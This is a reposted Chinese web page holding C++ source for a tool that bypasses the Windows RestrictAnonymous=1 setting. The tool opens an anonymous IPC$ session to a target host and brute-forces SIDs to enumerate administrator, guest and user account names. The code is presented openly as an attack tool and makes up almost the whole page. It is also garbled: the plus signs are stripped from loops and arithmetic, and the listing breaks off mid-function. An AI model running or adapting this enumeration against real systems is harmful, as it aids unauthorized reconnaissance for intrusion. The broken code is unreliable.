突破“RestrictAnonymous=1”限制枚举帐号的代码

////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(pro\server\adv)
//
//
// Create by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include <stdio.h>
#include <iostream.h>
#include <windows.h>
#include <Lm.h>

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

void MyPrintSidInfo(PSID, PSID_NAME_USE);
int MyConnectServer(LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD, LPTSTR);
int MyDisConnectServer(LPCTSTR, DWORD, BOOL);

int main (int argc, char* argv[])
{
int nRetCode, nSubAuthorityCount, i;
DWORD nSize;
int dwSubAuthority[8];
char szIpc[50] = "";
char szServer[30] = "";
PSID pSid;
PSID pNewSid;
LPTSTR lpDomainName;
LPTSTR lpUserName;
PSID_NAME_USE peUse;
PSID_IDENTIFIER_AUTHORITY pSIA;

nSize = 1024;

pSid = (PSID) LocalAlloc(LPTR, 1024);
lpDomainName = (LPTSTR) LocalAlloc(LPTR, 1024);
peUse = (PSID_NAME_USE) LocalAlloc(LPTR, 1024);
lpUserName = (LPTSTR) LocalAlloc(LPTR, 1024);

sprintf (szIpc, "%s", argv[1]);
sprintf (szServer, "%s", argv[1]);
NETRESOURCE NET;

if (argc<2)
return 0;

NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf ("Connecting %s...", szIpc);
nRetCode = MyConnectServer(&NET, "", "", 0, szIpc);
if (nRetCode)
{
printf ("Failed!\n");
return 0;
}
else
{
printf ("Successfully!\n");
}

if (!LookupAccountName(argv[1], "guest", pSid, &nSize, lpDomainName, &nSize, peUse))
{
printf ("Lookup failed!%d\n", GetLastError());
goto End;
}

printf ("DomainName:%s\n", lpDomainName);
pSIA = GetSidIdentifierAuthority(pSid);
MyPrintSidInfo(pSid, peUse);
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i )
{
dwSubAuthority[i] = (int) *GetSidSubAuthority(pSid, i);
}

//lookup system account
for (i = 0; i < 10; i )
{
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(500 i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d\n",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
printf ("Lookup error!%d\n", GetLastError());
break;
}
else
{
printf ("UserName: %s\n", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
FreeSid(pNewSid);
}

//look up user account
for (i = 0; i < 100; i )
{
FreeSid(pNewSid);
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(1000 i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d\n",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
}
else
{
printf ("UserName: %s\n", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
}

End:

FreeSid(pNewSid);
FreeSid(pSid);
LocalFree(lpDomainName);
LocalFree(peUse);
Sleep (100);
printf ("Disconnecting server...");
if (MyDisConnectServer(szIpc, CONNECT_UPDATE_PROFILE, TRUE))
printf ("Failed!%d\n", nRetCode);
else
printf ("Successfully!\n");
return 0;
}

void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
int i;
int nSubAuthorityCount;
PSID_IDENTIFIER_AUTHORITY pSIA;

pSIA = GetSidIdentifierAuthority(pSid);
printf ("\tSID:");
if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0)
{
ULONG ulSIA = (ULONG)(pSIA->Value[5] )
(ULONG)(pSIA->Value[4] << 8)
(ULONG)(pSIA->Value[3] << 16)
(ULONG)(pSIA->Value[2] << 24);
printf ("S-1-%d",ulSIA);
}
else
cout << hex << (USHORT)pSIA->Value[0]
<< (USHORT)pSIA->Value[1]
<< (USHORT)pSIA->Value[2]
<< (USHORT)pSIA->Value[3]

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有